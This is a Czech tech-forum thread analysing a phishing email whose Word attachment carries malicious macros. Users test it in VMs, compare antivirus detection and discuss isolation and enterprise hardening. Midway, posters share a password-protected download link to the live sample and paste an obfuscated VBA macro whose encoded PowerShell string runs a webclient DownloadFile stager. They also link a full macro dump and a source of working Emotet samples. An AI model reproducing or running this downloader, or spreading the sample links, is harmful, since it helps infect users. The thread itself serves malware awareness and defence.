Phishingových útoků pomocí mailů přibývá

A jak tak koukám, tak žádný z "velkých" antivirů by to nezachytil. Takže zdravý rozum je opět silnější.

Ano, přesně o tom to je.
Možná by antivir zablokoval spuštění toho vlastního downloaderu, ale na to se taky nedá spoléhat. Zvlášť, když jsou u počítače i děti.

Já takové štěstí neměl, nemohl bys dát odkaz na stažení toho doc?
Mimochodem, ty dva linky na virustotal jsou stejné, předpokládám, že jsi chtěl dát ten druhý na downloadera a ne na doc.

Ty 2 linky jsem dal úmyslně stejné, pokud by člověk jeden přehlédnul.
Na pitvání Wordu jsem čas neměl.

Word je ke stažení zde:
http://leteckaposta.cz/570536830
heslo: poradna.net

Dík za doc.
Defender jej detekuje, tedy aspoň v mém testu ve virtuálce:

Uvažuju, že bych otevřel ten doc a zkusil povolit makro, co to udělá

Nasel ho (Antivirus az na defender nemam).
Gmail :
I Gmail mi ho detektoval okamzite :

Po stahnuti je ozanacen jako nebepecny.

EDGE + Hotmail:
Homail/outlook nechal vesel prilozeny .doc stahnout, bez problému ho ulozil bez nejakého upozorneni az defender po nejaké dobe vyhodil hlasku.

Zvláštní je to, že ten Defender mi jej detekoval asi před aktualizací (čistě nainstalovaný Win 10 20H1 19041, databáze tedy může být tak měsíc stará) a po aktualizaci Defenderu si Defender toho doc nějak nevšímá Pokračovat v testování budu až udělám oběd a po obědě

Protože aktualizace databází antivirů není to, že přidají nebezpečné hrozby ale i to, že odendají ty méně časté. Teda až na Avast, který furt jede stylem "čím víc, tím líp" a pak to vypadá, jak to vypadá. Avast musí projíždět bambiliony stránek hrozeb, když ti kontroluje počítač a zaseká to tak, že ani technik, co ti dával PC dohromady, by ho nepoznal. Ostatně u antivirů je lepší používat prostě selský rozum - neznám toho člověka ani mail? Čau, letíš do koše a nebudu tě ani otevírat, natož něco stahovat. Když si chce člověk užít a pro prdel to otevřít, tak jen ve virtuálce a jen pokud to za to stojí. Trojský kůň vážně už zábava není, dnes to umí obejít už i dítě a technicky to je dle mě strašně zastaralý typ viru, který se dnes ani moc už nevyvíjí, protože to cílí spíše na důchodce, kteří by si pro díl Ulice nebo Ordinace zdarma nechali vrtat i koleno.

Windows 10 1809
Defender po vyhledání aktualizací dostal verzi 1.307.1633.0
z 3.1.2020 7:45
vlastní kontrola (pravý klik na souboru, zkontrolovat) -> žádnou hrozbu nenašel (virustotal 11/58, microsoft undetected).

nastavení defenderu: ochrana v reálném čase vypnuto; cloudová ochrana zapnuto; automatické odesílání vzorků vypnuto

resumé: virustotal uploader tool je dobrá věc

Zaujímavé že mne za 14 rokov do mailu neprišiel nikdy ani jeden pishing mail. Asi ma nemajú radi.

Každý měsíc dostávám maily na porno stránky, fake seznamky... Všude je nějaký downloader něčeho. Nikam jsem se neregistroval. Mě by spíše zajímalo, kde zjistili můj mail, pakliže ten hlavní používám jen na FB a práci. Asi si nějaký šprýmař řekl, že moje manželka je zlá, tak mě někam zaregistroval a ta stránka nechtěla očividně ani potvrzení

Virtuálka Windows 10 20H1 19041, Office 2019, internet povolený.
jsem zklamaný, vůbec nic to neprovedlo, teda ničeho jsem si zatím nevšimnul
Screeny z Office (ve spojleru), první je po otevření Office, druhý po povolení maker, třetí po několika minutách jsem ručně zavřel dokument a vyhodilo to nějaký okýnko, že se našla škodlivá makra a že se Office zavře aby ochránil moje data.
Co mám udělat, aby to něco provedlo?
Ještě du projít log z Process Monitoru

Takže přidávám další info.
Defender ten doc aktuálně nedetekuje, nechá i povolit makra (obsah), detekuje ale až spuštění samotného makra (maker) (což je např. klik kdekoliv v souboru) a detekuje tu hrozbu jako:

takže pokud je jako ochrana Defender a je aktuální tak se pravděpodobně nic nestane.
Pokud se Defender zakáže, otevře se dokument, povolí se makra (obsah) a klikne se někam v dokumentu, tak se začnou dít věci, teda aspoň na pozadí, jako spouštět cmd, powershell, atd.... Po pár desítkách sekund nebo minut jsem raději virtuálce odpojil net a pak myslím ta činnost přestala. Pak jsem povolil Defender a provedl rychlý sken, nenašlo to nic. Viditelné následky žádné, ani po restartu. Po zkouknutí Autoruns nic co by patřilo malwaru, ani zavěšená dll v registru žádná. Mám log z process monitoru, ale zkoumat jej nebudu. Jinak žádné známky toho, že by mi to přelezlo z virtuálky do pc nebo se šířilo po síti.
Je možné že jsem tomu nedal dostatek času, ale rači to znova už zkoušet nebudu
Kdyby to někdo taky testoval dejte vědět své poznatky

Měl jsi panu Kučerovi odepsat, že na něj podáváš žalobu za cyberútok :)
Přišlo to alespoň z nějaké normální e-mailové adresy (jasně, třeba v telnetu ti to může poslat i z Bílého domu kdokoliv)? Koukal ses do hlavičky mailu?

Díky TheBat vidím rovnou kromě jména i e-mailovou adresu, což přestává být u dnešních klientů samozřejmostí. Samozřejmě to přišlo s "divné" adresy:
Vít Kucera <andrew@appsrvspath.deaftawasol.com> (advokátní kancelář k.law)

Takže na klientovi nebo webovém rozhraní uvidíš jméno, případně info v závorce, ale skutečnou adresu neuvidíš.

Webklient Seznamu ukazuje adresu odesílatele hned vedle jména.

moc nechápu některé onanisty, kteří jásají, že defender nebo jiný av vir "už našel". v takovém případě jde o každý den, ne o nějaké "už to vidí".
taky předpokládejte běžný materiál u pc: "tady mi to nejde, no toto, pošlu si to domů a tam to stáhnu". 50% obyvatel jsou idioti, viz volební výsledky.
jestli věříte tomu, že v česku byly loni napadené pouze 2 medializované firmy a jen proto, že neměly všude win10 workstation se zakázaným smbv1 nebo se 4x látaným rdp, mezi těch tupých 50% patříte taky.

edit: někde výš tady čtu...

a zkusil povolit makro, co to udělá

ve firmě je to nutnost. o nastavení office se stará centrální it a dokumenty bez maker bývají nefunkční, takže jsou vždy povolené.
kdo spoléháte na vytuněné domácí zabezpečení, nevíte jak funguje polovina trhu.
ale zrovna reagovat na lidi z živě je ztráta času.

Co se týče Defendera.
Já jen napsal info jak reaguje na spuštění toho dokumentu defaultní antivirová ochrana Windows 10 a to je Defender. A to s defaultní databází v instalačce Windows 10 20H1 (19041) a posléze i s aktuální databází. Antiviry nepoužívám, na svém pc mám i Defendera zakázaného. Psal jsem to čistě informačně, ne jako nějaké onanování.
Co se týče věření.
Já v to, cos uvedl, nevěřím a jsem tedy rád, že mezi těch 50 % tupých nepatřím
Co se týče té citace.
Testoval jsem ve virtuálce s defaultně nainstalovaným Windows 10 20H1 (19041) a defaultně nainstalovaným Office 2019, pokud by ses díval na mé obrázky ve spojlerech, tak bys tam viděl to defaultní Povolit obsah v Office. Navíc jak jsem psal ve virtuálce na default Windows 10 a Office 2019. Navíc virtuálka připojená k internetu. Navíc virtuálka spuštěná na mém pc, který má oproti defaultu zakázaného Defendera a žádné tunící zabezpečení (a ani v office na pc nemám do teď zakázaná makra), i z virtuálky normální přístup na můj pc. Navíc ne bůhvíjak silné heslo na pc. Navíc další pc a zařízení v síti a nejen moje, tak se pak nediv, že jsem napsal:

Uvažuju, že bych otevřel ten doc a zkusil povolit makro, co to udělá

tedy ve smyslu, jestli mám ve virtuálce spustit to makro a kliknout tedy na Povolit obsah, když to teoreticky může ohrozit i to co je mimo virtuálku. Risknul jsem to a povolil jej. Takže žádné vytuněné domácí zabezpečení.
Co se týče té další věci a to maker ve firmách, pokud tam jsou potřeba tak to řešit podepisováním maker a povolit jen podepsaná + v Office zakázat ActiveX. Například dokument v tomto vlákně by tak byl pořešený i bez antiviru.

A byl jsi schopen z toho *doc to makro/VBA vytáhnout (jako text)? Pokud ano, mohl bys to sem (jako code) pastnout?
Já to stahovat a zkoušet určitě nebudu, jen by mě zajímal přesný obsah.

Staré doc, i novější docx nebo docm jsou zip soubory. V jakém formátu a specifikaci to tam je uložené netuším, nezajímal jsem se o to, ale nějak by i z těch souborů nejspíš mělo jít přímo vycucnout ty makra. V těch starých doc je to po rozbalení ve složce Macros.
Včera jsem ukládal ten text maker přímo z wordu, v tom doc je jich tam myslím 12, text toho prvního je:

Function qriswicitfomawa()
ibzwyrwvclbo = "6a756868696e6e776c6a6d65696c70" & "6678656e796e637975696668716e7a" & "6b6d68766862726b726c6666"
vjuxs = Array(9693, 6284, 4127, 2911, 9563, 3146, 6670, 497, 7922, 2433, 75, 2148, 8259, 9609, 2287, 8757, 3086, 8106, 970)
rzzgpmd = 850916944
drihbqbutnbdqh
End Function
Function onbzfjjbqtsjpa(eelhbgecanqzg As String)
tmaqwsigcghrrykwyaemhl = True
sykykvlmtwgjhuoawzbr = 21154
eelhbgecanqzg = "APQAiAHgAdgBtAHEAegBhAGMAcwBiAHgAbwBkAGEAbwB6ACIAOwAKACQAbgBlAHIAbgB4AHAAdwA9ACYAKAAiAG4AZQB3AC0AbwBiAGoAZQBjAHQAIgApACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAJABuAGgAZAByAHUAdgBtAGsAZQBvAGIAYgB3AHIAPQAiAHQAbQBrAHQAYQAiADsACgAkAG4AZQByAG4AeABwAHcALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAGwAYQB0AHIAcgBqAHoALAAgACQAdwB4AHgAdwBzAHkAaQApADsACgAkAHYAZQB2AHkAagBlAHkAdQBzAGEAaAB3AHkAPQAiAGEAZABrAGUAYwBoAG4AYgB0AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHcAeAB4AHcAcwB5AGkAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQA1ADcAMw"
onbzfjjbqtsjpa = eelhbgecanqzg
iepwmrhgfacsnlohi = Array(9227, 7826, 9298, 863, 8096, 4252, 5145, 4469, 6798, 8997, 1016, 9270, 3679, 1040, 3025, 2845, 8773, 1314)
End Function 

Nevlezou se tu všechny, všechny jsou tu:
https://uloz.to/file/DIJRXlGPvqH8/sprava-doc-txt
je to normální neškodný textový soubor a je možné že jej i tak budou detekovat nějaké antiviry. A mezi jednotlivými makry jsou volné 3 řádky.
Jestli chceš ještě něco jinýho tak napiš odkud to mám zkopírovat
Jo a jestli chceš vysvětlit co v těch makrech je, tak to fakt netuším, VBA nějak neovladám

tedy ve smyslu, jestli mám ve virtuálce spustit to makro a kliknout tedy na Povolit obsah, když to teoreticky může ohrozit i to co je mimo virtuálku.

Nemoze, prave preto sa taketo veci testuju vo virtualke.

Pokud nemáš ve virtuálu namapované disky z hostitelského systému
Jinak ve Virtuálu se dá vhodně použít systém snapshotu. Otestovat, kouknout se, co to podělalo a pak zahodit aktuální stav a vrátit se ke stavu snapshotu.

Ve virtuálce jsem měl připojený internet (protože ty makra v doc obvykle pak stahují ještě něco z netu jako např. emotet a nemělo by smysl to testovat bez připojeného internetu) a z virtuálky byl tedy i síťový přístup na můj pc. Stačilo abych měl na pc třeba povolený nezaplátovaný SMB1 a ten malware ve virtuálce byl něco jako wannacry nebo emotet/trickbot/ryuk a za chvilku bych měl zašifrovaný pc.
A to teoreticky jsem psal proto, že SMB1 a RDP povolený sice nemám, ale ono se úplně nedá vyloučit to, že to teoreticky může být jakýkoliv malware, třeba využívající ještě nezaplátovanou chybu Windows nebo i virtuálka může mít nějakou zranitelnost, případně mám něco špatně nastavené a mohlo by se to tam dostat prostě proto, že jsem něco opomenul. Jako to riziko je minimální (podle mě to ale není nemůže) a nejsem třeba nemocnice, takže jsem jej spustil.

Presne tak riziko je minimalne, a preto som napisal, ze nemoze, pretoze beznemu userovi je zbytpocne vysvetlovat a strasit ho, co vsetko je mozne a co nie.
Bezny use rma virtualku za natom, cize ani keby si mal smb1, co rdp nezaplatovane tak ta ten pc proste nevidi.

Tak teď ti vůbec nerozumím. Mám VMware a z těch možností, které nabízí, používám tři možnosti:
a) defaultní možnost VMware je "NAT: Used to share the host's IP address" - to používám, pokud ve virtuálce chci internet, což jsem použil i v tom testu a předpokládám to odpovídá i tomu tvému "Bezny user ma virtualku za natom". Funguje přitom internet a ta lokální síť VMnet8, kde hostitel je na 192.168.*.1
b) "Host-only: A private network shared with the host" - funguje ta lokální síť VMnet1, kde hostitel je na 192.168.*.1, internet nefunguje.
c) Úplně vypnu ve virtuálce "Network Adapter" (nezafaifkuju Connected) - pouze v tom případě se na hostitele nedostanu, v tom případě nefunguje ani internet, ani lokální síť.
V případě a) i b) normálně funguje připojení na hostitele, což je ta 192.168.*.1 (to třetí číslo je různý podle instalace a podle sítě).
Když mám například na hostiteli apache, tak se k němu z virtuálky normálně připojím. Tak nechápu jak myslíš to "tak ta ten pc proste nevidi".

Beriem spat...len som si v hlave otocil NATko opacne.
Vlastne nie tak celkom, lebo moj povodny nazor, ze nakazenie hostitela hostom je naozaj nepravdepodobne zostava...v standardnom prevedeni proste nemozne.
Ale ak ti ide o to dotlacit ma k tomu, ze snadbox je bezpecnejsi tak ano je...ten je uzavrety celkom, takze tam je riziko nulove.

Nebo SandBox pro izolované testování (po uzavření se vše zničí a nové otevření Sandboxu spustí čisté prostředí), který je ve Windows 10 od 2019 (build 18305) již nativně podporován. Bohužel jen pro verze Pro nebo Entreprise.
(alespoň ho v tomto směru uprednustnuji před VM)

https://www.cnews.cz/windows-sandbox-predstaveni/

Pro spuštění Sandboxu stačí v podstatě jen Windows Sansbox povolit ve funkcích systému :

Nejde o onanii nad antiviry. Kód je "šifrovaný", takže jej antivir bude těžko ve Wordu bez nějakých vodítek (aktualizovaná databáze) detekovat.
Ne všichni mají aktualizované systémy, aktualizované Office (hlavně ve firmách).
Doma zase budou všichni pracovat pod adminem a obyčejný uživatel se vyděsí a hned si bude chtít přečíst, v čem lítá. A i když ví, že nic takového se ho netýká, tak to udělá ze zvědavosti, aby se dozvěděl, co chudák spolubližní provedl.
Pak v euforii prokliká vše, co se mu ukáže, jen aby se k textu dostal.

Je to čisté sociální inženýrství, kdy uživatel sám dobrovolně dá útočníkovi k dispozici vlastní počítač.

Pobavily mne zprávy o "hackerském útoku" na benešovskou nemocnici. Nesmál jsem se tomu, co se stalo, to snad nemůže nikdo. Smál jsem se tuposti našich médií. A to nemluvím jen o jednom ráááádiu, kde měli anketu, co by lidi takovému hackerovi udělali.
K čemu máme NKUIB, který nezasáhne a nevysvětlí lidem, co se opravdu stalo?
Z jediného důvodu. Bude to použito jako další argument na zvyšování kybernetické bezpečnosti a s tím související zvýšení pravomocí státních orgánů zasahovat lidem více do života, nasazení více špiclovacích prostředků a lidi tomu ještě rádi zatleskají.

Přitom to je o zabezpečení sítě v nemocnici. Tohle se může stát kdekoliv, kde podobný mail nezachytí antivir na vstupu, kde nezachytí antivir na stanici spuštění škodlivého kódu.
Ale doteď nerozumím tomu, jak se to mohlo z jedné stanice dostat do sítě celé nemocnice, jak se to mohlo dostat k databázovým souborům, které byly zašifrované, jak se to mohlo dostat k zálohám, které byly také částečně zašifrované.
Pokud měl daný tupý uživatel přístup všude a ještě na zápis, pak je to chyba IT v nemocnici. A to vůbec nechci přemýšlet o tom, že to způsobilo přímo IT.

To rozšíření bývá úplně prosté - od úvodní kompromitace pomocí nějakého droppera po vlastní outbreak kryptoviru stačí, aby se na kompromitovaném PC přihlásil doménový admin.

Protože je typický stav, že lokální užovky mají admin práva, takže se dokáží nacpat do libovolného účtu.

opakuje se tady blábol, že stačí mít zalepený systém w10 na chybu smbv1 / případně rovnou zakázáno.
spěte dál: https://www.govcert.cz/cs/informacni-servis/hrozby/2530-eternalrocks-vaznejsi-hrozba-nez-wannacry/

mě se toto upozornění j.fialy líbí, píše že už je možné se běžně setkat s těmito maily s downloaderem.
to, že si ve firmě jeden člověk otevře přílohu ve virtuálce, firmě nepomůže. co těch 999 ostatních?

já obsah spam složky moc neřeším, pokud tam neleží nějaký mail od pravděpodobného odesílatele, všechny bez otvírání mažu.
takže nemohu sloužit, nevím jestli něco takového prošlo kolem.

Kde se tady opakuje blábol? Jestli myslíš v tomto vlákně tak o SMB jsi tu psal jen ty a já.
A já jsem rozhodně nikde nepsal, že STAČÍ mít zaplátovaný Win10 na SMB1 nebo rovnou zakazaný.
Vím kolik CVE se ve Windows opravuje, nebo mám přečteno i například Bezpečnostní doporučení núkib pro administrátory, CIS Controls (na cisecurity.org je kromě CIS Controls zajímavé i CIS Benchmark, což jsou doporučení od odborníků na kybernetickou bezpečnost pro jednotlivé OS a programy, např. pdf jen na Windows 10 1909 má 1266 stran), Zabezpeceni koncovych zarizeni vasich uzivatelu, i informační servis na govcert čtu takže jsem dávno četl i tu tebou odkazovanou stránku, atd., tak bych já to STAČÍ opravdu napsat nemohl.
A co se týče:

to, že si ve firmě jeden člověk otevře přílohu ve virtuálce, firmě nepomůže. co těch 999 ostatních?

No těch 999 ostatních si ji klidně může otevřít i ve firmě . Pak bude nejspíš záležet co je to za firmu:
a) pokud řeší kybernetickou bezpečnost aspoň trošku tak přílohu buď neotevře vůbec nebo otevře bez toho aby jakkoliv uškodila
b) pokud na kybernetickou bezpečnost kašle tak bude mít problém jeden pc
c) pokud na kybernetickou bezpečnost kašle totálně, tak nebude fungovat celá firma
jelikož b) a c) je nejspíš úplně normální stav tak bych minimálně chtěně to otevírání nikde neprováděl
Pokud někdo chce číst něco zajímavého ohledně bezpečnosti tak:
https://www.cisecurity.org/controls/
https://www.cisecurity.org/cis-benchmarks/
https://www.nukib.cz/download/vzdelavani/doporuceni/NUKIB_doporuceni_admin_3.0_barva.pdf
http://download.microsoft.com/documents/cs-cz/enterprise/02_2017/2_Zabezpeceni_koncovych_zarizeni_vasich_uzivatelu.pdf
https://www.govcert.cz/cs/informacni-servis/hrozby/2721-varovani-o-hrozbe-emotet-trickbot-ryuk/
V tom posledním odkazu je i link na funkční emotety (to co nejspíš sejmulo OKD) - tedy aspoň v prosinci funkční byly - jako myslím ten paste.cryptolaemus.com.

Až když to tady čtu, tak jsem se podíval do spamu a je to tam!
Akorát ta e-mailová adresa odesílatele je divná a ten mix češtiny a slovenštiny je zarážející. Je hezký, jak obecně a nekonkrétně je daný text napsán, jen aby příjemce tu přílohu otevřel. Sociální inženýrství jak má být.

A odesilatel?

https://pc.poradna.net/flashes/2968838-pishingovych-utoku-pomoci-mailu-pribyva#r2969197

larry@virtech-test.iveond.com

Ja to nemam ani ve spamu Nikdo me nema rad, nikdo mi nepise, ani dedictvi po bohatych africkych stryccich mi nenabizi...

Další verze:

Tlapnet s.r.o.

Dobrý den,

evidujeme neuhrazené pohledávky za poskytování našich služeb. Dokument s podrobnostmi neleznete v příloze.

Přehled o pohledávkách je dostupný i v zákaznickém portále.

S pozdravem
Tlapnet s.r.o.